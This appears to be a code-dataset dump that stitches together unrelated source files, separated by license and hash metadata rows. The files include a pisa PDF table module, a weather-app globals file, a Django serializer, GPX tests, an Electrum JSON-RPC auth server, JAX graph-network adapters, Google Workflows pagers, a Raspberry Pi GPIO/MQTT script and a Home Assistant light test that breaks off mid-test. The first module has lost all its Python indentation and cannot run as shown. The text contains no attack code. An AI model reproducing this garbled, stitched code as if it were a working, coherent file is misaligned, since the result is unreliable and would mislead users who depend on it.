#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__reversion__ = "$Revision: 20 $"
__author__ = "$Author: holtwick $"
__date__ = "$Date: 2007-10-09 12:58:24 +0200 (Di, 09 Okt 2007) $"
from pisa_tags import pisaTag
from pisa_util import *
from pisa_reportlab import PmlTable, TableStyle, PmlKeepInFrame
import copy
import sys
import logging
log = logging.getLogger("ho.pisa")
def _width(value=None):
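    # Percent widths (e.g. "50%") are kept as strings for the table layout
    # code to resolve later; absolute values are converted via getSize().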
if value is None:
return None
value = str(value)
if value.endswith("%"):
return value
return getSize(value)
class TableData:
def __init__(self):
self.data = []
self.styles = []
self.span = []
self.mode = ""
self.padding = 0
self.col = 0
# self.c = None
def add_cell(self, data=None):
self.col += 1
self.data[len(self.data) - 1].append(data)
def add_style(self, data):
# print self.mode, data
# Do we have color and
# width = data[3]
#if data[0].startswith("LINE"):
# color = data[4]
# if color is None:
# return
self.styles.append(copy.copy(data))
def add_empty(self, x, y):
self.span.append((x, y))
def get_data(self):
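        # Re-insert empty placeholder cells at positions covered by
        # row/column spans so every row matches the full grid width.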
data = self.data
for x, y in self.span:
try:
data[y].insert(x, '')
except:
pass
return data
def add_cell_styles(self, c, begin, end, mode="td"):
def getColor(a, b):
return a
self.mode = mode.upper()
        if c.frag.backColor and mode != "tr": # XXX is this correct?
self.add_style(('BACKGROUND', begin, end, c.frag.backColor))
# print 'BACKGROUND', begin, end, c.frag.backColor
if 0:
log.debug("%r", (
begin,
end,
c.frag.borderTopWidth,
c.frag.borderTopStyle,
c.frag.borderTopColor,
c.frag.borderBottomWidth,
c.frag.borderBottomStyle,
c.frag.borderBottomColor,
c.frag.borderLeftWidth,
c.frag.borderLeftStyle,
c.frag.borderLeftColor,
c.frag.borderRightWidth,
c.frag.borderRightStyle,
c.frag.borderRightColor,
))
if getBorderStyle(c.frag.borderTopStyle) and c.frag.borderTopWidth and c.frag.borderTopColor is not None:
self.add_style(('LINEABOVE', begin, (end[0], begin[1]),
c.frag.borderTopWidth,
c.frag.borderTopColor,
"squared"))
if getBorderStyle(c.frag.borderLeftStyle) and c.frag.borderLeftWidth and c.frag.borderLeftColor is not None:
self.add_style(('LINEBEFORE', begin, (begin[0], end[1]),
c.frag.borderLeftWidth,
c.frag.borderLeftColor,
"squared"))
if getBorderStyle(c.frag.borderRightStyle) and c.frag.borderRightWidth and c.frag.borderRightColor is not None:
self.add_style(('LINEAFTER', (end[0], begin[1]), end,
c.frag.borderRightWidth,
c.frag.borderRightColor,
"squared"))
if getBorderStyle(c.frag.borderBottomStyle) and c.frag.borderBottomWidth and c.frag.borderBottomColor is not None:
self.add_style(('LINEBELOW', (begin[0], end[1]), end,
c.frag.borderBottomWidth,
c.frag.borderBottomColor,
"squared"))
self.add_style(('LEFTPADDING', begin, end, c.frag.paddingLeft or self.padding))
self.add_style(('RIGHTPADDING', begin, end, c.frag.paddingRight or self.padding))
self.add_style(('TOPPADDING', begin, end, c.frag.paddingTop or self.padding))
self.add_style(('BOTTOMPADDING', begin, end, c.frag.paddingBottom or self.padding))
class pisaTagTABLE(pisaTag):
def start(self, c):
c.addPara()
attrs = self.attr
# Swap table data
c.tableData, self.tableData = TableData(), c.tableData
tdata = c.tableData
# border
#tdata.border = attrs.border
#tdata.bordercolor = attrs.bordercolor
begin = (0, 0)
end = (-1, - 1)
if attrs.border and attrs.bordercolor:
frag = c.frag
frag.borderLeftWidth = attrs.border
frag.borderLeftColor = attrs.bordercolor
frag.borderLeftStyle = "solid"
frag.borderRightWidth = attrs.border
frag.borderRightColor = attrs.bordercolor
frag.borderRightStyle = "solid"
frag.borderTopWidth = attrs.border
frag.borderTopColor = attrs.bordercolor
frag.borderTopStyle = "solid"
frag.borderBottomWidth = attrs.border
frag.borderBottomColor = attrs.bordercolor
frag.borderBottomStyle = "solid"
# tdata.add_style(("GRID", begin, end, attrs.border, attrs.bordercolor))
tdata.padding = attrs.cellpadding
#if 0: #attrs.cellpadding:
# tdata.add_style(('LEFTPADDING', begin, end, attrs.cellpadding))
# tdata.add_style(('RIGHTPADDING', begin, end, attrs.cellpadding))
# tdata.add_style(('TOPPADDING', begin, end, attrs.cellpadding))
# tdata.add_style(('BOTTOMPADDING', begin, end, attrs.cellpadding))
# alignment
#~ tdata.add_style(('VALIGN', (0,0), (-1,-1), attrs.valign.upper()))
# Set Border and padding styles
tdata.add_cell_styles(c, (0, 0), (-1, - 1), "table")
# bgcolor
#if attrs.bgcolor is not None:
# tdata.add_style(('BACKGROUND', (0, 0), (-1, -1), attrs.bgcolor))
tdata.align = attrs.align.upper()
tdata.col = 0
tdata.row = 0
tdata.colw = []
tdata.rowh = []
tdata.repeat = attrs.repeat
tdata.width = _width(attrs.width)
# self.tabdata.append(tdata)
def end(self, c):
tdata = c.tableData
data = tdata.get_data()
# Add missing columns so that each row has the same count of columns
# This prevents errors in Reportlab table
try:
maxcols = max([len(row) for row in data] or [0])
except ValueError:
log.warn(c.warning("<table> rows seem to be inconsistent"))
            maxcols = 0
for i, row in enumerate(data):
data[i] += [''] * (maxcols - len(row))
try:
if tdata.data:
# log.debug("Table sryles %r", tdata.styles)
t = PmlTable(
data,
colWidths=tdata.colw,
rowHeights=tdata.rowh,
# totalWidth = tdata.width,
splitByRow=1,
# repeatCols = 1,
repeatRows=tdata.repeat,
hAlign=tdata.align,
vAlign='TOP',
style=TableStyle(tdata.styles))
t.totalWidth = _width(tdata.width)
t.spaceBefore = c.frag.spaceBefore
t.spaceAfter = c.frag.spaceAfter
# XXX Maybe we need to copy some more properties?
t.keepWithNext = c.frag.keepWithNext
# t.hAlign = tdata.align
c.addStory(t)
else:
log.warn(c.warning("<table> is empty"))
except:
log.warn(c.warning("<table>"), exc_info=1)
# Cleanup and re-swap table data
c.clearFrag()
c.tableData, self.tableData = self.tableData, None
class pisaTagTR(pisaTag):
def start(self, c):
tdata = c.tableData
row = tdata.row
begin = (0, row)
end = (-1, row)
tdata.add_cell_styles(c, begin, end, "tr")
c.frag.vAlign = self.attr.valign or c.frag.vAlign
tdata.col = 0
tdata.data.append([])
def end(self, c):
c.tableData.row += 1
class pisaTagTD(pisaTag):
def start(self, c):
if self.attr.align is not None:
#print self.attr.align, getAlign(self.attr.align)
c.frag.alignment = getAlign(self.attr.align)
c.clearFrag()
self.story = c.swapStory()
# print "#", len(c.story)
attrs = self.attr
tdata = c.tableData
cspan = attrs.colspan
rspan = attrs.rowspan
row = tdata.row
col = tdata.col
        while 1:
            for x, y in tdata.span:
                if x == col and y == row:
                    col += 1
                    tdata.col += 1
                    break
            else:
                # no span occupies (col, row); position found
                break
#cs = 0
#rs = 0
begin = (col, row)
end = (col, row)
if cspan:
end = (end[0] + cspan - 1, end[1])
if rspan:
end = (end[0], end[1] + rspan - 1)
if begin != end:
#~ print begin, end
tdata.add_style(('SPAN', begin, end))
for x in range(begin[0], end[0] + 1):
for y in range(begin[1], end[1] + 1):
if x != begin[0] or y != begin[1]:
tdata.add_empty(x, y)
# Set Border and padding styles
tdata.add_cell_styles(c, begin, end, "td")
# Calculate widths
# Add empty placeholders for new columns
if (col + 1) > len(tdata.colw):
tdata.colw = tdata.colw + ((col + 1 - len(tdata.colw)) * [_width()])
        # Get value of width, if no spanning
if not cspan:
# print c.frag.width
width = c.frag.width or self.attr.width #self._getStyle(None, attrs, "width", "width", mode)
            # If it is a value, set it in the right place in the array
# print width, _width(width)
if width is not None:
tdata.colw[col] = _width(width)
# Calculate heights
if row + 1 > len(tdata.rowh):
tdata.rowh = tdata.rowh + ((row + 1 - len(tdata.rowh)) * [_width()])
if not rspan:
height = None #self._getStyle(None, attrs, "height", "height", mode)
if height is not None:
tdata.rowh[row] = _width(height)
tdata.add_style(('FONTSIZE', begin, end, 1.0))
tdata.add_style(('LEADING', begin, end, 1.0))
# Vertical align
valign = self.attr.valign or c.frag.vAlign
if valign is not None:
tdata.add_style(('VALIGN', begin, end, valign.upper()))
# Reset border, otherwise the paragraph block will have borders too
frag = c.frag
frag.borderLeftWidth = 0
frag.borderLeftColor = None
frag.borderLeftStyle = None
frag.borderRightWidth = 0
frag.borderRightColor = None
frag.borderRightStyle = None
frag.borderTopWidth = 0
frag.borderTopColor = None
frag.borderTopStyle = None
frag.borderBottomWidth = 0
frag.borderBottomColor = None
frag.borderBottomStyle = None
def end(self, c):
tdata = c.tableData
c.addPara()
cell = c.story
# Handle empty cells, they otherwise collapse
#if not cell:
# cell = ' '
        # Keep in frame if needed since Reportlab does not split inside of cells
if (not c.frag.insideStaticFrame) and (c.frag.keepInFrameMode is not None):
# tdata.keepinframe["content"] = cell
cell = PmlKeepInFrame(
maxWidth=0,
maxHeight=0,
mode=c.frag.keepInFrameMode,
content=cell)
c.swapStory(self.story)
tdata.add_cell(cell)
class pisaTagTH(pisaTagTD):
pass
'''
end_th = end_td
def start_keeptogether(self, attrs):
self.story.append([])
self.next_para()
def end_keeptogether(self):
if not self.story[-1]:
self.add_noop()
self.next_para()
s = self.story.pop()
self.add_story(KeepTogether(s))
def start_keepinframe(self, attrs):
self.story.append([])
self.keepinframe = {
"maxWidth": attrs["maxwidth"],
"maxHeight": attrs["maxheight"],
"mode": attrs["mode"],
"name": attrs["name"],
"mergeSpace": attrs["mergespace"]
}
# print self.keepinframe
self.next_para()
def end_keepinframe(self):
if not self.story[-1]:
self.add_noop()
self.next_para()
self.keepinframe["content"] = self.story.pop()
self.add_story(KeepInFrame(**self.keepinframe))
''' | mit | 3,694,893,880,446,124,500 | 32.439206 | 122 | 0.517475 | false |
timevortexproject/timevortex | weather/utils/globals.py | 1 | 1404 | #!/usr/bin/python3
# -*- coding: utf8 -*-
# -*- Mode: Python; py-indent-offset: 4 -*-
"""Globals for weather app"""
from datetime import datetime, timedelta
from django.conf import settings
KEY_METEAR_NO_SITE_ID = "metear_no_site_id"
KEY_METEAR_BAD_URL = "metear_bad_url"
KEY_METEAR_PROBLEM_WS = "metear_problem_ws"
KEY_METEAR_BAD_CONTENT = "metear_bad_content"
KEY_METEAR_NO_START_DATE = "metear_no_start_date"
PROCESS_STOPPED = "Process stopped. Wait a minute before retrying."
ERROR_METEAR = {
KEY_METEAR_NO_SITE_ID: "No METEAR Site in database. %s" % PROCESS_STOPPED,
KEY_METEAR_BAD_URL: "Bad URL to target METEAR service. %s" % PROCESS_STOPPED,
KEY_METEAR_PROBLEM_WS: "METEAR Web service does not respond. %s" % PROCESS_STOPPED,
KEY_METEAR_BAD_CONTENT: "Bad content from METEAR Web service. %s" % PROCESS_STOPPED,
KEY_METEAR_NO_START_DATE: "No start date found in DB. %s" % PROCESS_STOPPED,
}
SETTINGS_METEAR_URL = "METEAR_URL"
SETTINGS_DEFAULT_METEAR_URL = "http://www.wunderground.com/history/airport/%s/%s/DailyHistory.html?format=1"
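# The two %s slots are the station code and a %Y/%m/%d date, e.g. the
# (hypothetical) pair ("LFPG", "2016/01/31").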
SETTINGS_STUBS_METEAR_URL = "%s%s" % (settings.SITE_URL, "/stubs/history/airport/%s/%s/DailyHistory.html?format=1")
SETTINGS_STUBS_NEW_METEAR_URL = "%s%s" % (
settings.SITE_URL, "/stubs/history/airport/%s/%s/NewDailyHistory.html?format=1")
SETTINGS_STUBS_METEAR_START_DATE = (datetime.today() - timedelta(days=3)).strftime("%Y/%m/%d")
| mit | -9,200,364,049,418,442,000 | 49.142857 | 115 | 0.712251 | false |
uclouvain/osis | reference/api/serializers/study_domain.py | 1 | 1550 | ##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2021 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from rest_framework import serializers
from reference.models.domain import Domain
class StudyDomainSerializer(serializers.ModelSerializer):
class Meta:
model = Domain
fields = (
'uuid',
'code',
'name',
)
| agpl-3.0 | 3,864,788,192,204,684,000 | 39.763158 | 87 | 0.634603 | false |
fortyninemaps/karta | tests/gpx_tests.py | 1 | 2736 | import unittest
import os
from test_helper import TESTDATA
import numpy as np
import karta
import karta.vector as vector
from karta.vector.geometry import Point, Multipoint, Line, Polygon
class GPXTests(unittest.TestCase):
def setUp(self):
self.points = [vector.gpx.Point((np.random.random(), np.random.random()),
{}, {}) for i in range(20)]
self.segments = [vector.gpx.Trkseg(self.points, {}, {})]
self.tracks = [vector.gpx.Track(self.segments, {}, {})]
self.routes = [vector.gpx.Route(self.points, {}, {})]
self.Point = vector.gpx.Point
self.Trkseg = vector.gpx.Trkseg
self.Track = vector.gpx.Track
self.Route = vector.gpx.Route
return
def test_track_init(self):
""" Test initiation of a GPX file containing a single track. """
g = vector.gpx.GPX()
for i, pt in enumerate(self.points):
g.waypts.append(pt)
g.tracks = self.tracks
g.routes = self.routes
return
def test_add_waypoint(self):
waypoint = Point((-80.0, 82.0),
properties = {"name": "ellesmere", "ele": 100})
g = vector.gpx.GPX()
g.add_waypoint(waypoint)
expected = self.Point((-80.0, 82.0), {"name": "ellesmere",
"ele": "100"}, {})
self.assertEqual(g.waypts[0], expected)
return
def test_add_track(self):
track = Multipoint([(np.random.random(), np.random.random())
for i in range(10)], properties={"name":"segment0"})
g = vector.gpx.GPX()
g.add_track(track)
expected = self.Track([self.Trkseg(
[self.Point(tuple(xy), {}, {}) for xy in track.vertices()],
{"name":"segment0"}, {})], {}, {})
self.assertEqual(g.tracks[0], expected)
return
def test_add_route(self):
route = Multipoint([(np.random.random(), np.random.random())
for i in range(10)], properties={"name":"route0"})
g = vector.gpx.GPX()
g.add_route(route)
expected = self.Route([self.Point(tuple(xy), {}, {}) for xy in route.vertices()],
{"name":"route0"}, {})
self.assertEqual(g.routes[0], expected)
return
class ReadGPXTests(unittest.TestCase):
def test_mtn_bike_trail(self):
tracks = vector.read_gpx_tracks(os.path.join(TESTDATA, "gpx_input", "fishermans-trail.gpx"))
track1 = tracks[0]
seg1 = track1[0]
self.assertEqual(seg1.bbox(), (-123.00702, 49.32947, -122.991408, 49.392751))
if __name__ == "__main__":
unittest.main()
| mit | -4,095,670,081,740,067,000 | 35.972973 | 100 | 0.546784 | false |
cryptapus/electrum-myr | lib/jsonrpc.py | 1 | 3726 | #!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2018 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from jsonrpclib.SimpleJSONRPCServer import SimpleJSONRPCServer, SimpleJSONRPCRequestHandler
from base64 import b64decode
import time
from . import util
class RPCAuthCredentialsInvalid(Exception):
def __str__(self):
return 'Authentication failed (bad credentials)'
class RPCAuthCredentialsMissing(Exception):
def __str__(self):
return 'Authentication failed (missing credentials)'
class RPCAuthUnsupportedType(Exception):
def __str__(self):
return 'Authentication failed (only basic auth is supported)'
# based on http://acooke.org/cute/BasicHTTPA0.html by andrew cooke
class VerifyingJSONRPCServer(SimpleJSONRPCServer):
def __init__(self, rpc_user, rpc_password, *args, **kargs):
self.rpc_user = rpc_user
self.rpc_password = rpc_password
class VerifyingRequestHandler(SimpleJSONRPCRequestHandler):
def parse_request(myself):
# first, call the original implementation which returns
# True if all OK so far
if SimpleJSONRPCRequestHandler.parse_request(myself):
try:
self.authenticate(myself.headers)
return True
except (RPCAuthCredentialsInvalid, RPCAuthCredentialsMissing,
RPCAuthUnsupportedType) as e:
myself.send_error(401, str(e))
except BaseException as e:
import traceback, sys
traceback.print_exc(file=sys.stderr)
myself.send_error(500, str(e))
return False
SimpleJSONRPCServer.__init__(
self, requestHandler=VerifyingRequestHandler, *args, **kargs)
def authenticate(self, headers):
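        # Expects standard HTTP basic auth; e.g. for the credentials
        # "user:pass" the client sends:
        #   Authorization: Basic dXNlcjpwYXNz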
if self.rpc_password == '':
# RPC authentication is disabled
return
auth_string = headers.get('Authorization', None)
if auth_string is None:
raise RPCAuthCredentialsMissing()
(basic, _, encoded) = auth_string.partition(' ')
if basic != 'Basic':
raise RPCAuthUnsupportedType()
encoded = util.to_bytes(encoded, 'utf8')
credentials = util.to_string(b64decode(encoded), 'utf8')
(username, _, password) = credentials.partition(':')
if not (util.constant_time_compare(username, self.rpc_user)
and util.constant_time_compare(password, self.rpc_password)):
time.sleep(0.050)
raise RPCAuthCredentialsInvalid()
| mit | 1,195,370,511,997,288,000 | 38.221053 | 91 | 0.665056 | false |
google-research/google-research | ipagnn/adapters/gat_adapters.py | 1 | 2892 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Adapters for GAT models."""
import jax
import jax.numpy as jnp
from ipagnn.adapters import common_adapters
class GATAdapter(common_adapters.SequenceAdapter):
"""Adapter for GAT model."""
def as_example(self, dataset_item):
inputs = jax.tree_map(lambda x: x.numpy(), dataset_item)
example = {
'start_index': inputs['cfg']['start_index'],
'exit_index': inputs['cfg']['exit_index'],
'data': inputs['cfg']['data'],
'edge_types': inputs['cfg']['edge_types'],
'source_indices': inputs['cfg']['adjacency_list/source_indices'],
'dest_indices': inputs['cfg']['adjacency_list/dest_indices'],
'steps': inputs['cfg']['steps'],
'target_output': inputs['target_output'],
'target_output_length': inputs['target_output_length'],
'human_readable_target_output': inputs['human_readable_target_output'],
'human_readable_code': inputs['human_readable_code'],
}
if 'error_type' in inputs:
example['error_type'] = inputs['error_type']
return example
def get_train_inputs(self, example):
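    # Object-dtype fields hold human-readable strings, which cannot be fed
    # to the model, so only the numeric arrays are kept.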
return {key: value for key, value in example.items()
if value.dtype != jnp.dtype('O')}
class GGNNAdapter(common_adapters.SequenceAdapter):
"""Adapter for GGNN model."""
def as_example(self, dataset_item):
inputs = jax.tree_map(lambda x: x.numpy(), dataset_item)
example = {
'start_index': inputs['cfg']['start_index'],
'exit_index': inputs['cfg']['exit_index'],
'data': inputs['cfg']['data'],
'edge_types': inputs['cfg']['edge_types'],
'source_indices': inputs['cfg']['adjacency_list/source_indices'],
'dest_indices': inputs['cfg']['adjacency_list/dest_indices'],
'steps': inputs['cfg']['steps'],
'target_output': inputs['target_output'],
'target_output_length': inputs['target_output_length'],
'human_readable_target_output': inputs['human_readable_target_output'],
'human_readable_code': inputs['human_readable_code'],
}
if 'error_type' in inputs:
example['error_type'] = inputs['error_type']
return example
def get_train_inputs(self, example):
return {key: value for key, value in example.items()
if value.dtype != jnp.dtype('O')}
| apache-2.0 | 6,610,926,958,701,834,000 | 37.56 | 79 | 0.651107 | false |
googleapis/python-workflows | google/cloud/workflows_v1beta/services/workflows/pagers.py | 1 | 5782 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import (
Any,
AsyncIterable,
Awaitable,
Callable,
Iterable,
Sequence,
Tuple,
Optional,
)
from google.cloud.workflows_v1beta.types import workflows
class ListWorkflowsPager:
"""A pager for iterating through ``list_workflows`` requests.
This class thinly wraps an initial
:class:`google.cloud.workflows_v1beta.types.ListWorkflowsResponse` object, and
provides an ``__iter__`` method to iterate through its
``workflows`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListWorkflows`` requests and continue to iterate
through the ``workflows`` field on the
corresponding responses.
All the usual :class:`google.cloud.workflows_v1beta.types.ListWorkflowsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(
self,
method: Callable[..., workflows.ListWorkflowsResponse],
request: workflows.ListWorkflowsRequest,
response: workflows.ListWorkflowsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()
):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.workflows_v1beta.types.ListWorkflowsRequest):
The initial request object.
response (google.cloud.workflows_v1beta.types.ListWorkflowsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = workflows.ListWorkflowsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[workflows.ListWorkflowsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[workflows.Workflow]:
for page in self.pages:
yield from page.workflows
def __repr__(self) -> str:
return "{0}<{1!r}>".format(self.__class__.__name__, self._response)
class ListWorkflowsAsyncPager:
"""A pager for iterating through ``list_workflows`` requests.
This class thinly wraps an initial
:class:`google.cloud.workflows_v1beta.types.ListWorkflowsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``workflows`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListWorkflows`` requests and continue to iterate
through the ``workflows`` field on the
corresponding responses.
All the usual :class:`google.cloud.workflows_v1beta.types.ListWorkflowsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(
self,
method: Callable[..., Awaitable[workflows.ListWorkflowsResponse]],
request: workflows.ListWorkflowsRequest,
response: workflows.ListWorkflowsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()
):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.workflows_v1beta.types.ListWorkflowsRequest):
The initial request object.
response (google.cloud.workflows_v1beta.types.ListWorkflowsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = workflows.ListWorkflowsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[workflows.ListWorkflowsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[workflows.Workflow]:
async def async_generator():
async for page in self.pages:
for response in page.workflows:
yield response
return async_generator()
def __repr__(self) -> str:
return "{0}<{1!r}>".format(self.__class__.__name__, self._response)
| apache-2.0 | 7,345,909,831,732,091,000 | 36.303226 | 87 | 0.654445 | false |
sakthivigneshr/homeauto | src/control/rpi/rpi_gpio_slave.py | 1 | 1752 | import pika
import RPi.GPIO as GPIO
import paho.mqtt.client as mqtt
from threading import Thread
USER = "test"
PASS = "test123"
VHOST = "/cloudlynk"
HOST = "mohawk.link"
KEY = "solfeta"
XCHANGE = "home"
OUTPUT_PIN = 7
def callback(ch, method, properties, body):
level = int(body)
print("received msg: " + repr(level))
GPIO.output(OUTPUT_PIN, level)
def on_message(mqttc, app_data, msg):
level = int(msg.payload)
print "Received message " + repr(level)
GPIO.output(OUTPUT_PIN, level)
def on_connect(mqttc, app_data, flags, rc):
print "Connect successful"
mqttc.subscribe("control/lights/00")
class rabbitConnect(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
print "Starting RabbitMQ"
cred = pika.PlainCredentials(USER, PASS)
conn = pika.BlockingConnection(pika.ConnectionParameters(
host=HOST, virtual_host=VHOST, credentials=cred))
chan = conn.channel()
chan.exchange_declare(exchange=XCHANGE, type='topic')
rslt = chan.queue_declare(exclusive=True)
q = rslt.method.queue
chan.queue_bind(exchange=XCHANGE, queue=q, routing_key=KEY)
chan.basic_consume(callback, queue=q, no_ack=True)
chan.start_consuming()
class mqttConnect(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
print "Starting MQTT"
mqttc = mqtt.Client()
mqttc.on_message = on_message
mqttc.on_connect = on_connect
mqttc.connect("mohawk.link", 1883, 60)
mqttc.loop_forever()
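# Publishing "1" or "0" to the "control/lights/00" topic drives the output
# pin; for example (assuming the mosquitto clients are installed):
#   mosquitto_pub -h mohawk.link -t control/lights/00 -m 1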
def main():
# Setup the pins
GPIO.setmode(GPIO.BOARD)
GPIO.setup(OUTPUT_PIN, GPIO.OUT)
myThreadObj1 = rabbitConnect()
myThreadObj1.start()
myThreadObj2 = mqttConnect()
myThreadObj2.start()
myThreadObj1.join()
myThreadObj2.join()
if __name__ == "__main__":
main()
| mit | 8,074,197,039,635,007,000 | 22.052632 | 61 | 0.694635 | false |
persandstrom/home-assistant | tests/components/light/test_init.py | 1 | 17099 | """The tests for the Light component."""
# pylint: disable=protected-access
import unittest
import unittest.mock as mock
import os
from io import StringIO
from homeassistant import core, loader
from homeassistant.setup import setup_component, async_setup_component
from homeassistant.const import (
ATTR_ENTITY_ID, STATE_ON, STATE_OFF, CONF_PLATFORM,
SERVICE_TURN_ON, SERVICE_TURN_OFF, SERVICE_TOGGLE, ATTR_SUPPORTED_FEATURES)
from homeassistant.components import light
from homeassistant.helpers.intent import IntentHandleError
from tests.common import (
async_mock_service, mock_service, get_test_home_assistant, mock_storage)
class TestLight(unittest.TestCase):
"""Test the light module."""
# pylint: disable=invalid-name
def setUp(self):
"""Set up things to be run when tests are started."""
self.hass = get_test_home_assistant()
# pylint: disable=invalid-name
def tearDown(self):
"""Stop everything that was started."""
self.hass.stop()
user_light_file = self.hass.config.path(light.LIGHT_PROFILES_FILE)
if os.path.isfile(user_light_file):
os.remove(user_light_file)
def test_methods(self):
"""Test if methods call the services as expected."""
# Test is_on
self.hass.states.set('light.test', STATE_ON)
self.assertTrue(light.is_on(self.hass, 'light.test'))
self.hass.states.set('light.test', STATE_OFF)
self.assertFalse(light.is_on(self.hass, 'light.test'))
self.hass.states.set(light.ENTITY_ID_ALL_LIGHTS, STATE_ON)
self.assertTrue(light.is_on(self.hass))
self.hass.states.set(light.ENTITY_ID_ALL_LIGHTS, STATE_OFF)
self.assertFalse(light.is_on(self.hass))
# Test turn_on
turn_on_calls = mock_service(
self.hass, light.DOMAIN, SERVICE_TURN_ON)
light.turn_on(
self.hass,
entity_id='entity_id_val',
transition='transition_val',
brightness='brightness_val',
rgb_color='rgb_color_val',
xy_color='xy_color_val',
profile='profile_val',
color_name='color_name_val',
white_value='white_val')
self.hass.block_till_done()
self.assertEqual(1, len(turn_on_calls))
call = turn_on_calls[-1]
self.assertEqual(light.DOMAIN, call.domain)
self.assertEqual(SERVICE_TURN_ON, call.service)
self.assertEqual('entity_id_val', call.data.get(ATTR_ENTITY_ID))
self.assertEqual(
'transition_val', call.data.get(light.ATTR_TRANSITION))
self.assertEqual(
'brightness_val', call.data.get(light.ATTR_BRIGHTNESS))
self.assertEqual('rgb_color_val', call.data.get(light.ATTR_RGB_COLOR))
self.assertEqual('xy_color_val', call.data.get(light.ATTR_XY_COLOR))
self.assertEqual('profile_val', call.data.get(light.ATTR_PROFILE))
self.assertEqual(
'color_name_val', call.data.get(light.ATTR_COLOR_NAME))
self.assertEqual('white_val', call.data.get(light.ATTR_WHITE_VALUE))
# Test turn_off
turn_off_calls = mock_service(
self.hass, light.DOMAIN, SERVICE_TURN_OFF)
light.turn_off(
self.hass, entity_id='entity_id_val', transition='transition_val')
self.hass.block_till_done()
self.assertEqual(1, len(turn_off_calls))
call = turn_off_calls[-1]
self.assertEqual(light.DOMAIN, call.domain)
self.assertEqual(SERVICE_TURN_OFF, call.service)
self.assertEqual('entity_id_val', call.data[ATTR_ENTITY_ID])
self.assertEqual('transition_val', call.data[light.ATTR_TRANSITION])
# Test toggle
toggle_calls = mock_service(
self.hass, light.DOMAIN, SERVICE_TOGGLE)
light.toggle(
self.hass, entity_id='entity_id_val', transition='transition_val')
self.hass.block_till_done()
self.assertEqual(1, len(toggle_calls))
call = toggle_calls[-1]
self.assertEqual(light.DOMAIN, call.domain)
